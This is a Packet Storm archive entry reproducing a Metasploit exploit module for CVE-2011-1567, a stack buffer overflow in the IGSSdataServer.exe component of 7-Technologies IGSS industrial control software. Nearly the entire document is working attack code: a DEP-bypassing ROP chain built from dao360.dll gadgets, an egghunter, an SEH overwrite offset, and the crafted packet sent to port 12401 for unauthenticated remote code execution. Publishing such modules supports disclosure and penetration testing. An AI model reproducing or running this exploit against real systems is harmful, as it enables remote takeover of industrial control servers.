7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow

2011-05-16T00:00:00
ID PACKETSTORM:101465
Type packetstorm
Reporter Luigi Auriemma
Modified 2011-05-16T00:00:00

Description

                                        
                                            `##  
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::Egghunter  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",  
'Description' => %q{  
This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies  
IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application  
fails to do proper bounds checking before copying data into a small buffer on the stack.  
This causes a buffer overflow and allows to overwrite a structured exception handling record  
on the stack, allowing for unauthenticated remote code execution.  
},  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 12639 $',  
'Author' =>  
[  
'Luigi Auriemma', #Initial discovery, poc  
'Lincoln', #Metasploit  
'corelanc0d3r', #Rop exploit, combined XP SP3 & 2003 Server  
'sinn3r', #Serious Msf style policing  
],  
'References' =>  
[  
['CVE', '2011-1567'],  
['OSVDB', ''],  
['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],  
],  
'Payload' =>  
{  
'BadChars' => "\x00",  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => 'process',  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[  
'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',  
{  
'Ret' => 0x1b77ca8c, #dao360.dll pivot 1388 bytes  
'Offset' => 500  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => "March 24 2011",  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(12401)  
], self.class)  
end  
  
def junk  
return rand_text(4).unpack("L")[0].to_i  
end  
  
def exploit  
  
eggoptions =  
{  
:checksum => false,  
:eggtag => 'w00t',  
:depmethod => 'virtualprotect',  
:depreg => 'esi'  
}  
  
badchars = "\x00"  
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)  
  
#dao360.dll - pvefindaddr rop 'n roll  
rop_chain = [  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b7681c4, # rop nop  
0x1b72f174, # POP EAX # RETN 08  
0xA1A10101,  
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08   
junk,  
junk,  
0x1b73a55c, # XCHG EAX,EBX # RETN  
junk,  
junk,  
0x1b724004, # pop ebp  
0x1b72f15f, # &push esp # retn 8  
0x1b72f040, # POP ECX # RETN  
0x1B78F010, # writeable  
0x1b7681c2, # xor eax,eax # retn  
0x1b72495c, # add al,40 # mov [esi+4],eax # pop esi # retn 4  
0x41414141,   
0x1b76a883, # XCHG EAX,ESI # RETN 00   
junk,  
0x1b7785c1, # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C   
junk,  
junk,  
0x1b78535c, # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10  
junk,  
junk,  
junk,  
junk,  
0x1b7280b4, # POP EDI # XOR EAX,EAX # POP ESI # RETN  
junk,  
junk,  
junk,  
junk,  
0x1b7681c4, # rop nop (edi)  
0x90909090, # esi -> eax -> nop  
0x1b72f174, # POP EAX # RETN 08  
0xA1F50214, # offset to &VirtualProtect  
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08  
junk,  
junk,  
0x1b73f3bd, # MOV EAX,DWORD PTR DS:[EAX] # RETN  
junk,  
junk,  
0x1b76a883, # XCHG EAX,ESI # RETN 00  
0x1b72f040, # pop ecx  
0x1B78F010, # writeable (ecx)  
0x1b764716, # PUSHAD # RETN  
].pack('V*')  
  
header = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"  
header << rand_text(14)  
sploit = rop_chain  
sploit << "\x90" * 10  
sploit << hunter  
sploit << rand_text(target['Offset'] - (sploit.length))  
sploit << [target.ret].pack('V')   
sploit << egg  
sploit << rand_text(2000)  
  
connect  
print_status("Sending request...")  
sock.put(header + sploit)  
handler  
disconnect  
  
end  
  
end  
`